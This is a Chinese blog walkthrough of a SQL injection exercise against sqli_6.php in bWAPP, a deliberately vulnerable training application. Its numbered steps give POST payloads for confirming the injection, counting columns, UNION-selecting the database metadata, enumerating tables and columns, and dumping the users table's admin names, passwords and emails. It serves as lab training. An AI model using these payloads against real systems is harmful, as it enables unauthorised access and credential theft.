SQL注入之bWAPP之sqli_6.php

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入之bWAPP之sqli_6.php相关的知识,希望对你有一定的参考价值。

1、POST型注入就要先找到POST参数,在搜索框输入“1”后提交,按F12查看审查元素,找到“网络”,再点击POST项,接着点击右边的“参数”,查看POST的参数为“title”,如下图:
技术分享图片
2、开始构造,在hackbar的POST栏里输入“title=1‘”,提交,返回的报错含有“%”,所以可以确定是搜索型注入。结果如下图:
技术分享图片
输入“title=1%‘and‘%‘=‘”,没有报错,说明是搜索型注入,结果如下图:
技术分享图片
3、判断字段数:
输入“title=1%‘order by 7 #+”正常;输入“title=1%‘order by 8 #+”报错,说明字段数为7,这里注释用“#”正常,用“--”会报错,我不知道为什么,结果如下图:
技术分享图片
技术分享图片
查看显示位置,输入“title=1%‘union select 1,2,3,4,5,6,7 #+”,结果如图:
技术分享图片
4、查询数据库等信息:
输入“title=1%‘union select 1,database(),version(),4,user(),6,7 #+”,查询数据库名、数据库版本、当前用户,结果如图:
技术分享图片
5、查询表名:
输入“title=1%‘union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘ #+”,较重要的是users表,结果如图:
技术分享图片
6、查询字段名:
输入“title=1%‘union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘users‘ #+”,较重要的字段名有admin、password、email,结果如图:
技术分享图片
7、查询字段内容:
输入“title=1%‘union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users #+”,结果如图:
技术分享图片

同样,有兴趣可以试试其他表和字段。

以上是关于SQL注入之bWAPP之sqli_6.php的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入之bWAPP之sqli_6.php

SQL注入之bWAPP之sqli_13.php

SQL注入之bWAPP之sqli_16.php

SQL注入之bWAPP之sqli_11.php

SQL注入之bWAPP之sqli_10-1.php

SQL注入之bWAPP之sqli_3.php